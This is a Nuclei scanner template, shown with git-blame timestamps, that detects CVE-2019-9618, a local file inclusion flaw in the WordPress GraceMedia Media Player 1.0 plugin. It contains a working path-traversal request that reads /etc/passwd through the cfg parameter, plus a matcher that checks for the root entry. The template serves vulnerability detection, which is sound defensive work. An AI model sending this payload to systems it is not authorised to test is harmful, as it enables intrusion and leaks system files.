my-nuclei-templates/CVE-2019-9618.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-16 01:28:45 +00:00
id: CVE-2019-9618
info:
2022-06-18 08:05:25 +00:00
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
2021-07-16 01:28:45 +00:00
author: daffainfo
2021-09-17 06:03:58 +00:00
severity: critical
2022-06-18 08:05:25 +00:00
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
2021-09-02 08:03:02 +00:00
reference:
2021-07-16 01:28:45 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
2021-09-17 06:03:58 +00:00
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-06-18 08:05:25 +00:00
cvss-score: 9.8
2021-09-17 06:03:58 +00:00
cve-id: CVE-2019-9618
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2019,wordpress,wp-plugin,lfi
2021-07-16 01:28:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-07-16 01:28:45 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
- 500
# Enhanced by mp on 2022/05/03